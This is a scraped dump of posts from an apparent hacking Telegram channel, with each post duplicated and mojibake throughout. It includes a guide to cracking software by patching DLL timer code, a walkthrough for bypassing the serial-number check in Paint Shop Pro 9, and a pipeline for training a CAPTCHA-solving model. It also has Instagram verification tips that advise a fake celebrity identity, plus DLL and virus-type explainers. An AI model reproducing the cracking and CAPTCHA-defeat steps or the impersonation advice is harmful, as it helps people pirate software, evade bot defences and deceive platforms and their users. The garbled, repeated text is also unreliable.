You Intersted More In :
Final Results
29%
Cracking Tutorials ?
17%
Termux Scripts ?
2%
Android Api ?
21%
Linux Tools ?
4%
Breaked Tools ?
27%
Crading Tutorials ?
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow to Crack Software by Modifying DLL Files:
t.me/UnderCodeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Learn Assembly programming. In order to crack most software, you will need to have a good grasp on assembly, which is a low-level programming language. Assembly is derived from machine language, and each assembly language is specific to the type of computer you are using.
> Most assembly language is expressed through binary and hexadecimal.
2) Image titled Crack Software by Modifying DLL Files
Gather your tools. In order to examine and modify DLLs, you will need several different tools. W32DASM is a software disassembler that allows you to pick apart programs. SoftIce is a Windows debugging tool. You'll also want a good coding text editor, such as UltraEdit or Notepad++.
3) Start the program you want to crack with W32DASM. This will show you what DLL files are being loaded by the program. Use W32DASM to examine which functions are being called from the DLL.
4) Find the counter function. Many programs use a timer for copy protection, and when the timer runs out, the user is no longer able to access the program. The goal is to find this counter code, and then bypass it.
5) If the program you are cracking uses a different form of protection, you will need to look for that instead.
6) Set a break-point on the counter. Once you've isolated the counter function, set SoftIce to break when it is encountered. This will allow you to look at the exact code that is occurring when the counter function is called.
7) Change the counter code. Now that you've found the code for the counter function, you can change the code so that the counter never reaches the point where it shuts you out of the program. For example, you could make it so that the counter cannot count up to the break limit or you can bypass the counter by jumping over it.
@ Steave(tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow to Crack Software by Modifying DLL Files:
t.me/UnderCodeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Learn Assembly programming. In order to crack most software, you will need to have a good grasp on assembly, which is a low-level programming language. Assembly is derived from machine language, and each assembly language is specific to the type of computer you are using.
> Most assembly language is expressed through binary and hexadecimal.
2) Image titled Crack Software by Modifying DLL Files
Gather your tools. In order to examine and modify DLLs, you will need several different tools. W32DASM is a software disassembler that allows you to pick apart programs. SoftIce is a Windows debugging tool. You'll also want a good coding text editor, such as UltraEdit or Notepad++.
3) Start the program you want to crack with W32DASM. This will show you what DLL files are being loaded by the program. Use W32DASM to examine which functions are being called from the DLL.
4) Find the counter function. Many programs use a timer for copy protection, and when the timer runs out, the user is no longer able to access the program. The goal is to find this counter code, and then bypass it.
5) If the program you are cracking uses a different form of protection, you will need to look for that instead.
6) Set a break-point on the counter. Once you've isolated the counter function, set SoftIce to break when it is encountered. This will allow you to look at the exact code that is occurring when the counter function is called.
7) Change the counter code. Now that you've found the code for the counter function, you can change the code so that the counter never reaches the point where it shuts you out of the program. For example, you could make it so that the counter cannot count up to the break limit or you can bypass the counter by jumping over it.
@ Steave(tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Cygwin Tutorial 2019 :
Cygwin (/หsษชษกwษชn/ SIG-win) is a POSIX-compatible environment that runs natively on Microsoft Windows. ... Cygwin provides native integration of Windows-based applications, data, and other system resources with applications, software tools, and data of the Unix-like environment.
instagram.com/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
WIndows :
1) download zip https://github.com/mirror/newlib-cygwin
2) Unzip
3) Go dir via cmd
> Dir newlib-cygwin
4) ./configure
5) make
6) To install them (by default in /usr/local/bin, /usr/local/lib, etc),
then do:
> make install
7) If you have more than one compiler on your system, it is often best to
explicitly set CC in the environment before running configure, and to
also set CC when running make. For example (assuming sh/bash/ksh):
> CC=gcc ./configure
> make
8) A similar example using csh:
> setenv CC gcc
9) ./configure
10) make
Written by ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Cygwin Tutorial 2019 :
Cygwin (/หsษชษกwษชn/ SIG-win) is a POSIX-compatible environment that runs natively on Microsoft Windows. ... Cygwin provides native integration of Windows-based applications, data, and other system resources with applications, software tools, and data of the Unix-like environment.
instagram.com/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
WIndows :
1) download zip https://github.com/mirror/newlib-cygwin
2) Unzip
3) Go dir via cmd
> Dir newlib-cygwin
4) ./configure
5) make
6) To install them (by default in /usr/local/bin, /usr/local/lib, etc),
then do:
> make install
7) If you have more than one compiler on your system, it is often best to
explicitly set CC in the environment before running configure, and to
also set CC when running make. For example (assuming sh/bash/ksh):
> CC=gcc ./configure
> make
8) A similar example using csh:
> setenv CC gcc
9) ./configure
10) make
Written by ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCracking App protec ted by Serial numbers
t.me/UndercOdeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> Targets:
1) Example64x.exe
> The actual installer.
> It is protected by needing a valid serial number to install.
2) Key.dll
> Extracted by installer.
> Used to verify keys when installing and does not need patched.
3) examplle64x.exe
> Checks for a corrupt install or modified files.
๐ฆProtection:
3) Cannot install without a valid serial number.
4) Produces a "Damaged or Illegally Modified" error if the main EXE file is executed
> but the program has not been installed.
๐ฆ Tools Required:
1) OllyDGB, IDA Pro, W32Dasm, or equivalent.
2) Sandboxie, Uniextract, or MSI Administrative Install.
๐ฆSolution:
1) Must extract "Paint_Shop_Pro_90.exe" or sandbox to get MSI file.
2) The "Jasc Paint Shop Pro 9.msi" file must then be extracted.
3) The data.cab will be extracted if using MSI Administrative Install or Uniextract.
๐ฆ May not be needed depend on app , but I copied the following to root of main EXE folder:
1) Common\Jasc Software Inc\JascThumbShellExt <--- Just copied files only
2) Common\Jasc Software Inc\JascUpdate <--- Not needed, but there for completeness
3) Windows <--- Just copied files only
4) Windows\Downloaded Program Files <--- Just copied files only
5) The contents of "program files\Jasc Software Inc\Paint Shop Pro 9" can be considered
6) the root folder, wherever you extracted it to. In the released version
> these files will always be placed in "%RELEASENAME%\portable\".
7) There is only one file that needs patched now that we have "installed" without having
to actually type in a serial number or verify in some other way.
Written by ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCracking App protec ted by Serial numbers
t.me/UndercOdeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> Targets:
1) Example64x.exe
> The actual installer.
> It is protected by needing a valid serial number to install.
2) Key.dll
> Extracted by installer.
> Used to verify keys when installing and does not need patched.
3) examplle64x.exe
> Checks for a corrupt install or modified files.
๐ฆProtection:
3) Cannot install without a valid serial number.
4) Produces a "Damaged or Illegally Modified" error if the main EXE file is executed
> but the program has not been installed.
๐ฆ Tools Required:
1) OllyDGB, IDA Pro, W32Dasm, or equivalent.
2) Sandboxie, Uniextract, or MSI Administrative Install.
๐ฆSolution:
1) Must extract "Paint_Shop_Pro_90.exe" or sandbox to get MSI file.
2) The "Jasc Paint Shop Pro 9.msi" file must then be extracted.
3) The data.cab will be extracted if using MSI Administrative Install or Uniextract.
๐ฆ May not be needed depend on app , but I copied the following to root of main EXE folder:
1) Common\Jasc Software Inc\JascThumbShellExt <--- Just copied files only
2) Common\Jasc Software Inc\JascUpdate <--- Not needed, but there for completeness
3) Windows <--- Just copied files only
4) Windows\Downloaded Program Files <--- Just copied files only
5) The contents of "program files\Jasc Software Inc\Paint Shop Pro 9" can be considered
6) the root folder, wherever you extracted it to. In the released version
> these files will always be placed in "%RELEASENAME%\portable\".
7) There is only one file that needs patched now that we have "installed" without having
to actually type in a serial number or verify in some other way.
Written by ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆC R A C K I N G CAPTCHA:
How to create a text-based CAPTCHA solving engine:
>This is a how-to guide for creating a CAPTCHA solving AI model that can be used to solve text-based CAPTCHAs as discussed in the following blog. Two helper scripts are provided that can aid in the CAPTCHA-labeling process.
instagram.com/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
A) Depencies :
1) Tensorflow - High Performance Numerical Computation
2) AOCR - Attention Optimal Character Recognition model
3) CV2 - OpenCv for reading and viewing images (Optional for helper scripts)
4) Glob - For file management (Optional for helper scripts)
ยป Each of these packages can be installed using:
pip install <package_name>
5) on Linux open terminal and type
> git clone https://github.com/FSecureLABS/captcha_cracking
6) cd captcha_cracking
7) The script can be used by executing:
> python catcha_labeling_script.py <directory with CAPTCHAs> <directory to store labeled CAPTCHAs>
8) AOCR Dataset Generation
> python label_generating_script.py <directory where CAPTCHAs are stored> <directory to store label file>
9) The Output : These files will have to be converted into the tfrecords format for the AOCR model. Copy the two files into the directory where the CAPTCHAs are stored and from the directory execute the following:
> aocr dataset train_labels.txt training.tfrecords
>aocr dataset test_labels.txt testing.tfrecords
10) AOCR Model Training
The AOCR model will have to be trained. This can be done by executing the following:
> aocr train training.tfrecords
11) The same values of --max-width and --max-height used for training should be provided for the validation step. The validation step will provide four readings per CAPTCHA namely:
> Accuracy - The accuracy of the entire image prediction. 100% indicates that all character were successfully predicted.
> Probability - The certainty of the model that the provided prediction is correct. This can be used to filter predictions of a trained model to improve submission accuracy.
> Loss - A higher loss indicates a bigger discrepancy between the learnt model and the validation data.
> Perplexity - A higher perplexity indicates that the validation data is "new" to the model and it hasn't learnt or seen anything like it before.
12) AOCR Model Deployment
> aocr export exported-model
> To create the server, execute the following command:
tensorflow_model_server --port=9000 --rest_api_port=9001 --model_name=<yourmodelname> --model_base_path=<full path to exported model directory>
ENJOY
WRitten by @UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆC R A C K I N G CAPTCHA:
How to create a text-based CAPTCHA solving engine:
>This is a how-to guide for creating a CAPTCHA solving AI model that can be used to solve text-based CAPTCHAs as discussed in the following blog. Two helper scripts are provided that can aid in the CAPTCHA-labeling process.
instagram.com/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
A) Depencies :
1) Tensorflow - High Performance Numerical Computation
2) AOCR - Attention Optimal Character Recognition model
3) CV2 - OpenCv for reading and viewing images (Optional for helper scripts)
4) Glob - For file management (Optional for helper scripts)
ยป Each of these packages can be installed using:
pip install <package_name>
5) on Linux open terminal and type
> git clone https://github.com/FSecureLABS/captcha_cracking
6) cd captcha_cracking
7) The script can be used by executing:
> python catcha_labeling_script.py <directory with CAPTCHAs> <directory to store labeled CAPTCHAs>
8) AOCR Dataset Generation
> python label_generating_script.py <directory where CAPTCHAs are stored> <directory to store label file>
9) The Output : These files will have to be converted into the tfrecords format for the AOCR model. Copy the two files into the directory where the CAPTCHAs are stored and from the directory execute the following:
> aocr dataset train_labels.txt training.tfrecords
>aocr dataset test_labels.txt testing.tfrecords
10) AOCR Model Training
The AOCR model will have to be trained. This can be done by executing the following:
> aocr train training.tfrecords
11) The same values of --max-width and --max-height used for training should be provided for the validation step. The validation step will provide four readings per CAPTCHA namely:
> Accuracy - The accuracy of the entire image prediction. 100% indicates that all character were successfully predicted.
> Probability - The certainty of the model that the provided prediction is correct. This can be used to filter predictions of a trained model to improve submission accuracy.
> Loss - A higher loss indicates a bigger discrepancy between the learnt model and the validation data.
> Perplexity - A higher perplexity indicates that the validation data is "new" to the model and it hasn't learnt or seen anything like it before.
12) AOCR Model Deployment
> aocr export exported-model
> To create the server, execute the following command:
tensorflow_model_server --port=9000 --rest_api_port=9001 --model_name=<yourmodelname> --model_base_path=<full path to exported model directory>
ENJOY
WRitten by @UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHOW GET BLUE TICK ON INSTAGRAM :
> A verified badge is a check that appears next to an Instagram account's name in search and on the profile. It means Instagram has confirmed that an account is the authentic presence of the public figure, celebrity or global brand it represents," Instagram explained in a post online
(T.me/UndercOdeTestingOfficial)
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Login, go to your profile and tap
2) Once you log into your Instagram account, head to your profile and click the three-lined bar at the top right corner.
3) Go to Settings > Request Verification
4) Once you click on the bar, you'll see an option to click on Settings, located at the bottom of your screen. After clicking Settings, scroll down to Request Verification.
5) Enter your full name and submit a form of ID
6) Your Instagram username should automatically be filled in, unless you're logged into a different account. Users who wish to be verified just need to enter their full name and then attach a photo of a government-issued ID, such as a driver's license of passport.
7) Once you attach the photo, you simply have to hit submit.
8) Submitting a request for verification does not guarantee that your account will be verified," however, Instagram notes on the page.
9) Users will be notified by Instagram if their application was accepted or denied.
โ ๏ธREQUIRE AT LEAST 1k Follower
& Min 100 likes
+ Fake identity like celebrity & some considerable number of views
@ Steaven(tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHOW GET BLUE TICK ON INSTAGRAM :
> A verified badge is a check that appears next to an Instagram account's name in search and on the profile. It means Instagram has confirmed that an account is the authentic presence of the public figure, celebrity or global brand it represents," Instagram explained in a post online
(T.me/UndercOdeTestingOfficial)
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Login, go to your profile and tap
2) Once you log into your Instagram account, head to your profile and click the three-lined bar at the top right corner.
3) Go to Settings > Request Verification
4) Once you click on the bar, you'll see an option to click on Settings, located at the bottom of your screen. After clicking Settings, scroll down to Request Verification.
5) Enter your full name and submit a form of ID
6) Your Instagram username should automatically be filled in, unless you're logged into a different account. Users who wish to be verified just need to enter their full name and then attach a photo of a government-issued ID, such as a driver's license of passport.
7) Once you attach the photo, you simply have to hit submit.
8) Submitting a request for verification does not guarantee that your account will be verified," however, Instagram notes on the page.
9) Users will be notified by Instagram if their application was accepted or denied.
โ ๏ธREQUIRE AT LEAST 1k Follower
& Min 100 likes
+ Fake identity like celebrity & some considerable number of views
@ Steaven(tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ What Is a DLL File?
t.me/UndercodeTestinGOFficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> A DLL file, short for Dynamic Link Library, is a type of file that contains instructions that other programs can call upon to do certain things. This way, multiple programs can share the abilities programmed into a single file, and even do so simultaneously.
> For example, several different programs might all call upon the veryuseful.dll file (I made that up, of course) to find the free space on a hard drive, locate a file in a particular directory, and print a test page to the default printer.
> Unlike executable programs, like those with the EXE file extension, DLL files can't be run directly but instead must be called upon by other code that is already running. However, DLLs are in the same format as EXEs and some may even use the .EXE file extension. While most Dynamic Link Libraries end in the file extension .DLL, others may use .OCX, .CPL, or .DRV.
> If you get a DLL error, your best bet is to find troubleshooting information specific to that DLL problem so you're sure to solve it the right way and for good. I may even have a specific fix-it guide for the one you have. I have a list of the most common DLL errors and how to fix them.
> DLL files are useful because they can allow a program to separate its different components into unique modules which can then be added or removed to include or exclude certain functionalities. When the software works this way with DLLs, the program can use less memory because it doesn't need to load everything at on
@ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ What Is a DLL File?
t.me/UndercodeTestinGOFficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> A DLL file, short for Dynamic Link Library, is a type of file that contains instructions that other programs can call upon to do certain things. This way, multiple programs can share the abilities programmed into a single file, and even do so simultaneously.
> For example, several different programs might all call upon the veryuseful.dll file (I made that up, of course) to find the free space on a hard drive, locate a file in a particular directory, and print a test page to the default printer.
> Unlike executable programs, like those with the EXE file extension, DLL files can't be run directly but instead must be called upon by other code that is already running. However, DLLs are in the same format as EXEs and some may even use the .EXE file extension. While most Dynamic Link Libraries end in the file extension .DLL, others may use .OCX, .CPL, or .DRV.
> If you get a DLL error, your best bet is to find troubleshooting information specific to that DLL problem so you're sure to solve it the right way and for good. I may even have a specific fix-it guide for the one you have. I have a list of the most common DLL errors and how to fix them.
> DLL files are useful because they can allow a program to separate its different components into unique modules which can then be added or removed to include or exclude certain functionalities. When the software works this way with DLLs, the program can use less memory because it doesn't need to load everything at on
@ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Telegram
UNDERCODE TESTING COMPANY OFFICIAL
๐ฆ ๐๐๐๐๐ ๐๐๐๐๐๐๐ & ๐๐๐๐๐๐๐ :
๏ธ ๐ ถ๐ ธ๐๐ ท๐๐ ฑ github.com/UnderCodeTestingC
๐ผ๐ฐ๐ธ๐ป Undercodetesting@hotmail.com
๐ต๐ฐ๐ฒ๐ด๐ฑ๐พ๐พ๐บ www.facebook.com/undercodetesting.companie
๐ธ๐ฝ๐ ๐ ๐ฐ๐ถ๐ ๐ฐ๐ผ instagram.com/UndercodeTestingCompany
๐ ๐ ๐ธ๐ ๐ ๐ด๐ Twitter.com/UnderCodeUTC
๏ธ ๐ ถ๐ ธ๐๐ ท๐๐ ฑ github.com/UnderCodeTestingC
๐ผ๐ฐ๐ธ๐ป Undercodetesting@hotmail.com
๐ต๐ฐ๐ฒ๐ด๐ฑ๐พ๐พ๐บ www.facebook.com/undercodetesting.companie
๐ธ๐ฝ๐ ๐ ๐ฐ๐ถ๐ ๐ฐ๐ผ instagram.com/UndercodeTestingCompany
๐ ๐ ๐ธ๐ ๐ ๐ด๐ Twitter.com/UnderCodeUTC
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHOW TO CREATE .DLL FILES ?
DLL files are dynamic-linked library files written and controlled with .DLLs make sharing, storing, and saving your code simple.we will show you how to create a DLL file with Visual Studio, the Windows application, or Visual Studio for Mac. Make sure you have โDesktop Development with C++โ checked when you install. If you already have Visual Studio but didnโt check that box, you can run the installer again to make sure you do.
powered by wiKi
instagram.com/UnderCodeTestingCompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Open Visual Studio. You can find this in your Start Menu or Applications folder. Since a DLL is a library of information, it is only one piece of a project, and usually requires an accompanying app to access it.
> You can get Visual Studio for Windows here: https://docs.microsoft.com/en-us/visualstudio/install/install-visual-studio?view=vs-2019
> Visual Studio for Mac can be downloaded here: https://docs.microsoft.com/en-us/visualstudio/mac/installation?view=vsmac-2019
2) Click New and Project. The โCreate a New Projectโ dialog box will pop up.
3)
Set the options for Language, Platform, and Project Type. These will filter what kinds of project templates appear.
> Click Language to get a drop-down menu and click C++.
4) Click Platform to get a drop-down menu and click Windows.
5) Click Dynamic-link Library (DLL). Your choice will highlight blue. Click Next to continue.
6) Type a name in the Name Box for the project. For example, type โMathLibraryโ in the box for a sample name.
7) Click Create. The DLL project is created.
8)
Add a header file to the DLL. You can do this by clicking โAdd New Itemโ from โProjectโ in the menu bar.
> Select Visual C++ from the left menu of the dialog box.
> Select Header file (.h) from the center of the dialog box.
> Type the name as โMathLibrary.hโ in the name field below the menu choices.
> Click Add to generate the blank header file.
9) Type the following code into the blank header file:
// MathLibrary.h - Contains declarations of math functions
#pragma once
#ifdef MATHLIBRARY_EXPORTS
#define MATHLIBRARY_API __declspec(dllexport)
#else
#define MATHLIBRARY_API __declspec(dllimport)
#endif
// The Fibonacci recurrence relation describes a sequence F
// where F(n) is { n = 0, a
// { n = 1, b
// { n > 1, F(n-2) + F(n-1)
// for some initial integral values a and b.
// If the sequence is initialized F(0) = 1, F(1) = 1,
// then this relation produces the well-known Fibonacci
// sequence: 1, 1, 2, 3, 5, 8, 13, 21, 34, ...
// Initialize a Fibonacci relation sequence
// such that F(0) = a, F(1) = b.
// This function must be called before any other function.
extern "C" MATHLIBRARY_API void fibonacci_init(
const unsigned long long a, const unsigned long long b);
// Produce the next value in the sequence.
// Returns true on success and updates current value and index;
// false on overflow, leaves current value and index unchanged.
extern "C" MATHLIBRARY_API bool fibonacci_next();
// Get the current value in the sequence.
extern "C" MATHLIBRARY_API unsigned long long fibonacci_current();
// Get the position of the current value in the sequence.
extern "C" MATHLIBRARY_API unsigned fibonacci_index();
12) Add a CPP file to the DLL. You can do this by clicking Add New Item from โProjectโ in the menu bar.
> Select โVisual C++โ from the left menu of the dialog box.
> Select โC++ File (.cpp)โ from the center of the dialog box.
> Type the name as โMathLibrary.cppโ in the name field below the menu choices.
> Click Add to generate the blank file.
+ ADd ANY EXtra code for fonctional you need
13) Click Build in the menu bar. Youโll find this either above the project space (Windows) or along the top of your screen (Macs).
@ ฬตอSteave(tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHOW TO CREATE .DLL FILES ?
DLL files are dynamic-linked library files written and controlled with .DLLs make sharing, storing, and saving your code simple.we will show you how to create a DLL file with Visual Studio, the Windows application, or Visual Studio for Mac. Make sure you have โDesktop Development with C++โ checked when you install. If you already have Visual Studio but didnโt check that box, you can run the installer again to make sure you do.
powered by wiKi
instagram.com/UnderCodeTestingCompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Open Visual Studio. You can find this in your Start Menu or Applications folder. Since a DLL is a library of information, it is only one piece of a project, and usually requires an accompanying app to access it.
> You can get Visual Studio for Windows here: https://docs.microsoft.com/en-us/visualstudio/install/install-visual-studio?view=vs-2019
> Visual Studio for Mac can be downloaded here: https://docs.microsoft.com/en-us/visualstudio/mac/installation?view=vsmac-2019
2) Click New and Project. The โCreate a New Projectโ dialog box will pop up.
3)
Set the options for Language, Platform, and Project Type. These will filter what kinds of project templates appear.
> Click Language to get a drop-down menu and click C++.
4) Click Platform to get a drop-down menu and click Windows.
5) Click Dynamic-link Library (DLL). Your choice will highlight blue. Click Next to continue.
6) Type a name in the Name Box for the project. For example, type โMathLibraryโ in the box for a sample name.
7) Click Create. The DLL project is created.
8)
Add a header file to the DLL. You can do this by clicking โAdd New Itemโ from โProjectโ in the menu bar.
> Select Visual C++ from the left menu of the dialog box.
> Select Header file (.h) from the center of the dialog box.
> Type the name as โMathLibrary.hโ in the name field below the menu choices.
> Click Add to generate the blank header file.
9) Type the following code into the blank header file:
// MathLibrary.h - Contains declarations of math functions
#pragma once
#ifdef MATHLIBRARY_EXPORTS
#define MATHLIBRARY_API __declspec(dllexport)
#else
#define MATHLIBRARY_API __declspec(dllimport)
#endif
// The Fibonacci recurrence relation describes a sequence F
// where F(n) is { n = 0, a
// { n = 1, b
// { n > 1, F(n-2) + F(n-1)
// for some initial integral values a and b.
// If the sequence is initialized F(0) = 1, F(1) = 1,
// then this relation produces the well-known Fibonacci
// sequence: 1, 1, 2, 3, 5, 8, 13, 21, 34, ...
// Initialize a Fibonacci relation sequence
// such that F(0) = a, F(1) = b.
// This function must be called before any other function.
extern "C" MATHLIBRARY_API void fibonacci_init(
const unsigned long long a, const unsigned long long b);
// Produce the next value in the sequence.
// Returns true on success and updates current value and index;
// false on overflow, leaves current value and index unchanged.
extern "C" MATHLIBRARY_API bool fibonacci_next();
// Get the current value in the sequence.
extern "C" MATHLIBRARY_API unsigned long long fibonacci_current();
// Get the position of the current value in the sequence.
extern "C" MATHLIBRARY_API unsigned fibonacci_index();
12) Add a CPP file to the DLL. You can do this by clicking Add New Item from โProjectโ in the menu bar.
> Select โVisual C++โ from the left menu of the dialog box.
> Select โC++ File (.cpp)โ from the center of the dialog box.
> Type the name as โMathLibrary.cppโ in the name field below the menu choices.
> Click Add to generate the blank file.
+ ADd ANY EXtra code for fonctional you need
13) Click Build in the menu bar. Youโll find this either above the project space (Windows) or along the top of your screen (Macs).
@ ฬตอSteave(tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBEST & Dangeous 2019 VIRUS INFECTIONS:
facebook.com/UnderCodeTestingCompanie
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Direct Action Virus
Direct action viruses attack certain types of files, typically .exe and .com files. The main purpose of this virus is to replicate and infect files in folders. On the lighter note, they do not typically delete files or affect PC performance and speed. It can be easily removed by antivirus programs.
Browser Hijacker
> This type of virus infects your web browser in which it will bring you to different websites. Typically, if you key in a domain name in the internet address bar, the browser hijacker will open multiple fake websites that may harm your computer. On the other hand, most trusted browsers have built-in features to block them ahead.
2) Overwrite Virus
From the name itself, this virus overwrites the content of a file, losing the original content. It infects folders, files, and even programs. To delete this virus, you also need to get rid of your file. Thus, it is important to back up your data.
3) Web Scripting Virus
This virus lives in certain links, ads, image placement, videos, and layout of a website. These may carry malicious codes in which when you click, the viruses will be automatically downloaded or will direct you to malicious websites.
4) Boot Sector Virus
Boot sector viruses affect floppy disks. They came to existence when floppy disks are important in booting a computer. Although they are not very common today, it is still causing other computer units, especially the outdated ones. Some examples include Polyboot.B and AntiEXE.
5) Macro Virus
Macro viruses target applications and software that contain macros. These viruses can carry out series of operations affecting the performance of the program or software. Some examples of macro viruses are O97M/Y2K, Bablas, Melissa.A, and Relax.
6) Directory Virus
Directory viruses change file paths. When you run programs and software that are infected with directory viruses, the virus program also runs in the background. Further, it may be difficult for you to locate the original app or software once infected with directory viruses.
7) Polymorphic Virus
Polymorphic viruses use a special method of encoding or encryption every time they infect a system. With this, antivirus software finds it hard to locate then using signature searches. They are also capable of replicating easily. Polymorphic viruses include Satan Bug, Elkern, Tuareg, and Marburg.
8) File Infector Virus
This virus also infects executable files or programs. When you run these programs, the file infector virus is activated as well which can slow down the program and produce other damaging effects. A large block of existing viruses belongs to this category.
9) Encrypted Virus
This type of virus uses encrypted malicious codes which make antivirus software hard to detect them. They can only be detected when they decrypt themselves during replication. Although they donโt delete files or folders, they can badly affect PC performance.
10) Companion Virus
This is a type of virus that doesnโt survive without accompanying an existing file or folder. In order to carry out damages, the file or folder being accompanied by companion viruses should be opened or run. Some examples of companion viruses include Terrax.1069, Stator, and Asimov.1539.
11) Network Virus
Basically, this type of virus spreads out through Local Network Area (LAN) and through the internet. These viruses replicate through shared resources, including drives and folders. When network viruses enter a computer, they look for their potential prey. Dangerous network viruses include Nimda and SQLSlammer.
12) Nonresident Virus
Nonresident viruses replicate through modules. When the module is executed, it will select one or more files to infect.
Stealth Virus
@ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBEST & Dangeous 2019 VIRUS INFECTIONS:
facebook.com/UnderCodeTestingCompanie
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Direct Action Virus
Direct action viruses attack certain types of files, typically .exe and .com files. The main purpose of this virus is to replicate and infect files in folders. On the lighter note, they do not typically delete files or affect PC performance and speed. It can be easily removed by antivirus programs.
Browser Hijacker
> This type of virus infects your web browser in which it will bring you to different websites. Typically, if you key in a domain name in the internet address bar, the browser hijacker will open multiple fake websites that may harm your computer. On the other hand, most trusted browsers have built-in features to block them ahead.
2) Overwrite Virus
From the name itself, this virus overwrites the content of a file, losing the original content. It infects folders, files, and even programs. To delete this virus, you also need to get rid of your file. Thus, it is important to back up your data.
3) Web Scripting Virus
This virus lives in certain links, ads, image placement, videos, and layout of a website. These may carry malicious codes in which when you click, the viruses will be automatically downloaded or will direct you to malicious websites.
4) Boot Sector Virus
Boot sector viruses affect floppy disks. They came to existence when floppy disks are important in booting a computer. Although they are not very common today, it is still causing other computer units, especially the outdated ones. Some examples include Polyboot.B and AntiEXE.
5) Macro Virus
Macro viruses target applications and software that contain macros. These viruses can carry out series of operations affecting the performance of the program or software. Some examples of macro viruses are O97M/Y2K, Bablas, Melissa.A, and Relax.
6) Directory Virus
Directory viruses change file paths. When you run programs and software that are infected with directory viruses, the virus program also runs in the background. Further, it may be difficult for you to locate the original app or software once infected with directory viruses.
7) Polymorphic Virus
Polymorphic viruses use a special method of encoding or encryption every time they infect a system. With this, antivirus software finds it hard to locate then using signature searches. They are also capable of replicating easily. Polymorphic viruses include Satan Bug, Elkern, Tuareg, and Marburg.
8) File Infector Virus
